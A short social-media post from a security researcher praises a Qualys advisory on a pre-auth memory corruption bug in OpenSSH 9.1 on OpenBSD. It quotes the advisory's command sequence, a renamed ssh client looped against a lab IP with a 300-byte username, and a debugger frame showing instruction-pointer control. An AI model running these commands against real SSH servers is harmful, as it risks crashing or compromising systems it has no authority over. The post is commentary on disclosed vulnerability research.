Post ASeyG7WSsvEYGIybJI by hdm@infosec.exchange
 (DIR) More posts by hdm@infosec.exchange
 (DIR) Post #ASeyG7WSsvEYGIybJI by hdm@infosec.exchange
       2023-02-14T04:53:11Z
       
       0 likes, 4 repeats
       
       This post by the Qualys Security Advisory team demonstrating rip/pc control on OpenSSH 9.1 (running on OpenBSD!) is savage: https://seclists.org/oss-sec/2023/q1/92Here I was thinking this bug was hopeless and they one-line it without writing new code:$ cp -i /usr/bin/ssh ./ssh$ sed -i s/OpenSSH_9.1/FuTTYSH_9.1/g ./ssh$ user=`perl -e 'print "A" x 300'` && while true ;do ./ssh -o NumberOfPasswordPrompts=0 -o Ciphers=aes128-ctr -l "$user:$user" 192.168.56.123 ;done...#1  0x4141414141414141 in ?? ()